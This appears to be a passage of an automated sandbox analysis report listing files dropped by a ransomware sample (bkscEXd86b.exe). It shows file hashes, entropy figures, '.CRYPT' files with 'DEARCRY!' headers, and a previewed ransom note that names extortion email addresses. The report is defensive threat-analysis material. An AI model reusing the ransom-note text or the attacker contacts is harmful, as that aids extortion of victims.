                                                            Category:dropped
                                                            Size (bytes):10394
                                                            Entropy (8bit):3.7093451032208797
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:7AC719B849C97BED5C7B860223445934
                                                            SHA1:1CBD2F769E65556CBBFAEFDCAA55D117B904E1D6
                                                            SHA-256:1BECC3478AFCBFE807E64654E59FDB0A664176E15F1CA4775A0C499792C1EE75
                                                            SHA-512:CED10D012884D9D4943940288048CAC5C3AF3E6967F45A1E0554C4A09509D31A189B327BED86A0B52B39377DAD9667D251B2B7CD84F0094661596E186EB3D63F
                                                            Malicious:false
                                                            Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.3.8.8.<./.P.i.d.>.......
                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER695.tmp.xml
                                                            Process:C:\Windows\System32\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4697
                                                            Entropy (8bit):4.4744095669796105
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:1E3A6B2366DC7068D00CCFFBE0676D57
                                                            SHA1:26C5216696FA04FA6B4E2165C068D6A6550A1E0B
                                                            SHA-256:1E6A6CC3F65CF80E24BCEF126B6F790A9FE85EEF8D6E203516335A1462833D32
                                                            SHA-512:EE0AEA2AAAD992E6AD1437DBF2859AC5B3EB5A3CEA04C0EBF2C10929106D2D3C6F29B5152E1CC3A8594AFBBCB253726EA4EC4286BD167A33EDD27397F34F085E
                                                            Malicious:false
                                                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="898147" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERF491.tmp.dmp
                                                            Process:C:\Windows\System32\WerFault.exe
                                                            File Type:Mini DuMP crash report, 16 streams, Fri Mar 12 07:57:17 2021, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):1090056
                                                            Entropy (8bit):1.4077656210049645
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:2BAC0ECA19230C5B3A1FA899C44AB62A
                                                            SHA1:D7DD070C3F4B8C5554B99200C18C9F6AC089CBA1
                                                            SHA-256:2688327BC66A39FCC0B044E7F5CB9F03C6031337C52C8F6F4FD5A9AAB3A9C916
                                                            SHA-512:F382AA410C95359E9F0BD540E55577359777C1446B2D79CF1F0E2ED7CC8B0C1F6C0C6A5F612D1734CA6651FC51C9F18EC80A06E69998C0850503A7FD031F7E91
                                                            Malicious:false
                                                            Preview: MDMP....... .........K`...................U...........B.......z......Lw.................'....T.......<.....K`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...a.m.d.6.4.,.1.0...0...1.7.1.3.4...1.......................................................................................................
                                                            C:\Users\Public\Desktop\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):1392
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:7D5EAF35D93FD6DCC9FD8837AED16ACD
                                                            SHA1:59E4FFDDA4239656019B69D3CC4328D60C0396A8
                                                            SHA-256:B077C256877A46386EA2FDB56E69A74C01FBD17C26DCCD454E63DF0B9147276C
                                                            SHA-512:281CB1265C87BE8AD7BF4AAE35D2252A9051C5823AF0BC8243777236953CE59A328875D9B90DFF4DAE80EB861FED8C4C95C8B62C7103448D4032F4028C784A94
                                                            Malicious:false
                                                            C:\Users\Public\Desktop\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):3648
                                                            Entropy (8bit):7.881423776988441
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:851FA52382CCD9154739B31B077D3244
                                                            SHA1:5866FF3A9DF9ABBF46A316F0C3E59C0271CCDCA2
                                                            SHA-256:D1C9C6AB2C006C94F3696C76A237C81474CC32DCF9585DD5A41E180ABE3DB481
                                                            SHA-512:4F1BCE895B7A9F009145475ECF22A6726887F17C6309DA8E27F9829F0BE932D296425243BD6B7F1EE96A4FA2266A747842A691B294627EB2E49DD78B54CE0EEC
                                                            Malicious:false
                                                            Preview: DEARCRY!....K...Y...lI...$....K...<.!..}.i=J......#...Q.f.G.+..H1. ..Tx..+...G....!.....r@6.E.....d.E.&[v.......O.A.N?.c............../. .:7..D...H..f..e.v.J9.gK....Ar.,ih.?..N/k.,.Rn.3..."..M.8DD.t8S.. D...A.^.0..i.(gm.?....@T..._*.^..4....7d.N).M.................(....Y............K..uk_[...9l...o..8v9.3]..;........X....%...dL.....X..H0`.p.q..C].O...q...}I.1../..?i5.8.....!..y....&2EId..A..o:...C....\IX.U[LK....%I..^...7.s..DEARCRY!......._{3...,..h\c.J.u.....C.n.0..n.+.OcM.U..\\..0...y..O.. .>..h..=.{i....p]E....^.LA...].I....F...@.?J.[.S....%..k...\..:LA4..pc.....z]..|=.6B..hZ{H]..T.6...fS*...]_~h.Z$.R.r..4............g.6..x.C>.^=.k..p..Y..F.R1.r..K,.d.Y.........,s.3.....1...............s.wo-...-I......!Ov........L.....<8I........5^...4.D..Hj..V.n,@=2%@...x...H..6u...<.1......"..yPo.J..s.Yx....<..$.....d.b.#4.p'.X.#../#*......5Q....J......|....4.L.Vq.XDEARCRY!..........\8..Tz..b......Zv>. .q1b.*bB.j.W.OX_=XG.,"....... i.[..B..~..X.`.Z
                                                            C:\Users\Public\Desktop\readme.txt
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):2007
                                                            Entropy (8bit):4.7613637261579855
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D20AFA4F2F4E9AF881EE2D1130AD4181
                                                            SHA1:2D5014E9ECBBE1A299F69FABB291FE11F75015CB
                                                            SHA-256:A7FE76D02FB5180745810E0C7F0BE9CA0879ECD4624A1A68FFF518C9B3E012BA
                                                            SHA-512:24EEDD4B85CDA7330D03BD69F2A2B125EBA2BEEE0C522EDEF6683CDBCDEB47FBA372EEF5C862536160FD91FE167F44119F78E3B2E01718FDB5FA4F7258E27A8A
                                                            Malicious:false
                                                            Preview: Your file has been encrypted!........ If you want to decrypt, please contact us......... konedieyp@airmail.cc or uenwonken@memail.com........ And please send me the following hash!........ d37fc1eabc6783a418d23a8d2ba5db5a..Your file has been encrypted!........ If you want to decrypt, please contact us......... konedieyp@airmail.cc or uenwonken@memail.com........ And please send me the following hash!........ d37fc1eabc6783a418d23a8d2ba5db5a..Your file has been encrypted!........ If you want to decrypt, please contact us......... konedieyp@airmail.cc or uenwonken@memail.com........ And please send me the following hash!........ d37fc1eabc6783a418d23a8d2ba5db5a..Your file has been encrypted!........ If you want to decrypt, please contact us......... konedieyp@airmail.cc or uenwonken@memail.com........ And please send me the following hash!........ d37fc1eabc6783a418d23a8d2ba5db5a..Your file has been encrypted!........ If you want to decrypt, please contact us......... konedieyp@airmail.c
                                                            C:\Users\Public\Documents\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):278
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:99A2CA325525DDFBAD6D84EA69A6B4B7
                                                            SHA1:3DA331758F501647C6065B5C1AD0F78FF3349D17
                                                            SHA-256:145B83928222884EBA630D21234FF5C2ACA2AB0206AEDA0B3D7C3D08188FBAC0
                                                            SHA-512:A75CFEAF6AC5269083A10462CD3AD4B44EBF46D9DC0C5E1D23FC9732F59EEED1E7C9E1168E2A24787B667E33BC15FA4B93105A62090D7A982BD94E9D6D512809
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\Users\Public\Documents\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):568
                                                            Entropy (8bit):7.628706618185732
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:A2048E17D6CC5412AB8D01EEB1EE545F
                                                            SHA1:46ECE3453E2D99093F7F5535635C2FD14BF35B82
                                                            SHA-256:6D3376ED67E9367593F7B5A4F7A2A972B75B4947D9CDDFDB48A34162EC35B6E3
                                                            SHA-512:5947F8B7C4F4F83827D62EB8A88722805CB595A8E46D040A028393FBFE6BD71853B1F84EA8E8F6DD5E45E1B7CA34CE056C89417E594DB5427CFA971CCFB64739
                                                            Malicious:false
                                                            Preview: DEARCRY!.........x.s..Oj=>Rq...qK..."s..`..-:..Tp....1..s..Q..^.e..(^=.kd....;{.@.u.0..2.h..v.;.*.wGx.@*..j.H.R$.z....I'l..X....-E...f...<T.h.uf..C...,.Ku)...x.v.O.3y.k........7?...8}HUF....0.M.Sk.F...}.U.a.O...OS@.LD..A._...r6.#...%.)1...aY,....9.7................`.G..C.<....~/....C.)..H[.&}s?2Y.E.]r....7... ..(K...L.0B..H......U....15F....C........X^..P..9%.sp.....?.....I\y..WK_.#.. ..}.?.....n.J.O.....r;...G.qMY.WP.`8.8...r.H[....p...175`.3.#...3d$.eY_..y...`.c.....o.......<q...qd.Q..n..0.[b..H...c%../.....rF....<u......`Q...!1
                                                            C:\Users\Public\Music\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):380
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:216F6E1CE2260194845F567B92900F22
                                                            SHA1:35BA03C2C4F32151D6B5AAA5429137638F0909EC
                                                            SHA-256:7A6EAA509C64E3229FE83EEBF52AB890F2977E08B7F88ACC44FC97F9F88D3F33
                                                            SHA-512:98E6869FC89E819FDF2F75CD843539303EB4E7366940869C107BA3B52B0DE377149F7B76407ACEF23865C5A043255720E783FF165C8D5A2C2E32BA6F101E7DFE
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\Users\Public\Music\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):664
                                                            Entropy (8bit):7.600444263675093
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:20B47987F02930A742966147740A6076
                                                            SHA1:2C4B7E6C6C909DD838266A6EAB7C06CC0FD9AB30
                                                            SHA-256:C952C5CB7915708280A50220FD317CDCB939857DA530341A0A3BFCEEFEA014CA
                                                            SHA-512:2C2038F579F49DBBE7EADB3A785FE81FBDC5A06417C0346A87980C22A4E53772990C10F4C395AC4786F23A25F59EB237138F12CE78656A508F2767A55552F3F7
                                                            Malicious:false
                                                            Preview: DEARCRY!....a$m.4..F.T.58E..Y.Nb.c3.7.M.LW5z.Rddd ..<.*w..lCIZ5...k!...E.)_...e..2...d$C.......7..)"......V...%..m?...2.....R....19..MF...e.Y.u(..mR..0~... J).i...W..m.........r....;.....Hg.a..'...k...@.0....c...R.O<.....Y-.d-d.m.Wxz.[B.;......v...>.........|.......Wv[@....)...<.^!u".VQ.X.c..QE...c.. ,...ZJ.2.%).*..,....../.Q..4.u..L.0.V.=..w..M(t....vb......S...".......^."E.X..>8.D:....\`.(-..a.p%k....M..E.....Cm.y.q....9 ,Q.7..T8f.+.C.....0I.D.\"..!5.JH'.kZ..(!5....M[x......ak.#&YMW....=..}q.k....8./.M.=..j......u....J...Aqk.n.Bf.k.%..J.3.%}.<...Ll.A.`...a^..Pb..#."<(.}....%.#q....Rew.C.........2.B;......]..)......X..Sw...>
                                                            C:\Users\Public\Pictures\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):2660
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:731D6C8FF02659464DA50A007B5C38D7
                                                            SHA1:6A3DE7A80BC786F0840E8B0A163FD893BF090017
                                                            SHA-256:6EF7EC6F69A78E0C2E409CD5D753A34D66920BE43E749B70CB6B738896EF2FBB
                                                            SHA-512:4E6B5F8E5621B679B372E5B2D15594DACAB368A87AD11E2E885350A5889207628D50E44EF1DD3B9018BA1B4762A77078B48411DA9474B7A45AC2CAB7F1214E9B
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\Users\Public\Pictures\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):4648
                                                            Entropy (8bit):7.919765594640715
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:0CED082F1FB4EB8AFD730CB5782B69BA
                                                            SHA1:390D52E66D94A50730D754A7F00B4CDD4C97CCB1
                                                            SHA-256:7D0CED9EC084D92041583DBF4CFD628CFA654CC9B6800DA2921971282CDB9C3A
                                                            SHA-512:084F495E0BA60B44D836D984B2F300B554FB2BA16379E83ADC827FCEF332DE3F6017140FBEAD07B50C5E3E68855F544549050B7E1B7EF261A777ED6EC136903B
                                                            Malicious:false
                                                            Preview: DEARCRY!......)..A..C.d.i....{.-l;Sj'e.........E.mHdZ'Y..`....z6U.)Q....Vs...}P..f.<.....\R..S%.i.Fv.a3.0..8%{+.J .....o...Z4H|..q.....Q......%~$.`.O.o.....*.....t...W.V.f........=..v..C.]...j.......4.@cj"...J..rA...{....2L...0......[....>..../.<....."....|.........._.,|......)..)R...........cF..!.B.zq#..er.Af.b."=}..P...WZ..EJ.*4..D....G..."./7..J...|.],h..1.~.9*R.R....o....v..INi..v:..R.....ShJ7.AX.....|...N.j..p.nG.G...'..x"..Z".p..!8f.?.K.q.*..E.!.}`#.(...NW....y..j.W.._\...&..t.......cl...y....&..}.=.j.l&W.. ..|Wy.L.-....`<.[.&..Q.I=/.t........ ....>.T.m....nf........./.5..^...$....#W...H.>..]0.17.Un..r.Y6WFp;DEARCRY!..........U......M.v.9r.l.2.6...b...%1<wh.[.ElaE.z..J.".j.9.:.!-,.*R.#...P...b$.L{[.....@.8..Q....G...!g.]. \]m.H..t...U<.\A....4sEC..>...T.F:g...H..H...W..#...P.......f.))....jI.Kq...4.....Dl&...:..$.O.F..,,..].....HH...4.y..W3Q;.O...H+.....G......|.......u#.`.L.....[yH......._.h.cPH.G...VM>.s...+M[....v.4~>.O.
                                                            C:\Users\Public\Videos\desktop.ini
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):2660
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:731D6C8FF02659464DA50A007B5C38D7
                                                            SHA1:6A3DE7A80BC786F0840E8B0A163FD893BF090017
                                                            SHA-256:6EF7EC6F69A78E0C2E409CD5D753A34D66920BE43E749B70CB6B738896EF2FBB
                                                            SHA-512:4E6B5F8E5621B679B372E5B2D15594DACAB368A87AD11E2E885350A5889207628D50E44EF1DD3B9018BA1B4762A77078B48411DA9474B7A45AC2CAB7F1214E9B
                                                            Malicious:false
                                                            Preview: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                            C:\Users\Public\Videos\desktop.ini.CRYPT
                                                            Process:C:\Users\user\Desktop\bkscEXd86b.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):4648
                                                            Entropy (8bit):7.921984855592276
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:A012E6A35E2F177ED0A42D7E8FB4A003
                                                            SHA1:DA3AB9000EE1FDF99B14789F26CA6733BB5DBF2F
                                                            SHA-256:2F0C45D35B9310000C755EB3076AB4D31C0947ABA975F2897BA812C80628FCEF
                                                            SHA-512:A2E91D351CC39611A58FA7924071CE09EB7AE9F7E4836B137BB4B8FE107EB7DD8D7742997C4CCC3416697E191D94A752C8EB40C282AEED29237FEAAFAB784CF0
                                                            Malicious:false
                                                            Preview: DEARCRY!....L.....`x33f...V..b.._.6......sS.&.......'..cbU.Ul.....h`....d.?rF*..5..k.B/J...VwB.5..K..6.G.h....h.F..T."..........5X......f..X..e..p.p..a..Me.:...4.7.\...uQ`v"..)p.L.U.-.......ei.^.kU....>{5..z;3.j..9..3.......qZ.X.......>.DSe9&.u..a`...P.W..#......|.......HAt....ujy!...)..^...`...b.....E...?.}.....!...fK.<+.r........pY...M...}...."e.....3..Y......9?..k./2..:.c..hij..#fB..H..{.a....e'.V...5)....?...".A.9.....Yu7....9....@X.......l@e.l...1H.................J....+.t.iS.~(..i.q.....sG.Lv.RF.s.b...v.'........]h..s.l.mf.3..A....5.^..{.r|...M)...p...,9....[.#D.|0x..3......&@/o.r...RA..|Fn..b.."....w....@.+..i.p.B.<HX/>.m.DEARCRY!....(1...H.Qr...++)..&..J..I65..iaN.P..uG.8...:...W.........P.....'D+Ga;.r.Di..5..a. ....9*G[N.....Gd..m...*...l).p...x...'hm.6K5..dJ......Y."R..(.....`.G.1.....o?..p.}...|...s........,.J...#.\dT......+Rt...$.j4.EC...Qn.N.........h$4.......|.........".#.]...5..........T.I~.....h.XG..f.!...A......6K.|'
                                                            C:\Users\user\AppData\Local\Microsoft\GameDVR\KnownGameList.bin
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):418744
                                                            Entropy (8bit):3.4492632557651244
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:0CE3B2508EF5A7A9A61BF0B09BB6611B
                                                            SHA1:CACE545D6F7DE7739A61DDA8D40CBB107575E6DD
                                                            SHA-256:4DBBE5DE4337E77871B03C953326828D95E124E69C782E72DD0ED67E801FB508
                                                            SHA-512:C99F07FD5139D8D3F761A1F27B4D7AE10254E57649015A3AB20735AB5F605E4F0773B99AC41AA3F6F8B99FC5B59FFDAC982AF429F5E5D4388B79C526DD655ADE
                                                            Malicious:false
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\NotifyIcon\Microsoft.Explorer.Notification.{F3021280-8B71-AE51-7BF9-DAA692344272}.png
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):685
                                                            Entropy (8bit):7.574420459296215
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:089E722D4905CA6D6C817FED5EEB8C73
                                                            SHA1:DE72D2CD21E7CDC6ABFEB1DC60EFB79969E1379E
                                                            SHA-256:7595D019957F2A499B8A44CE33A4049D4021BB8799B4E3F6D5A8BAB9DBCDF589
                                                            SHA-512:E7E7709C963910B7BFC2ECBAA48D3F3177FEF5D45AA7A8B324860C899077DBC807895D5F75DD4AE96B55C3C37A6F9978D96A86C36ED5A3849B9E2B708FD2945F
                                                            Malicious:false
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\72BKUTKD\BBDBvk5AokRBwrox4FNOb3dTd1E[1].css
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):7671
                                                            Entropy (8bit):5.15245035345059
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:A1F32F25C7C924B918EA54A86670D731
                                                            SHA1:F1BF7CB5ADDF0C4BCED58D661137A1F0ACD257C5
                                                            SHA-256:6B58339F9240E372FA046E985DA0D0C5A17B679F27FF3058D6EBD4CD515CA874
                                                            SHA-512:5ACEFCAB3062051BD538CCF57EBCBB0BC9FCF11C12768EC7559B2ADA84F871299CE2C93B2400807F362578AD2C0F31AFF5CFE925C2FB259A7FFD24CC498435ED
                                                            Malicious:false
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\72BKUTKD\BBDBvk5AokRBwrox4FNOb3dTd1E[2].css
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\72BKUTKD\I-iaeF2_hBWL-N4uY_JLxrlxDpc.br[1].js
                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                            File Type:empty
                                                            Category:dropped
                                                            Size (bytes):0
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D41D8CD98F00B204E9800998ECF8427E
                                                            SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                            SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                            SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                            Malicious:false
                                                            Preview:
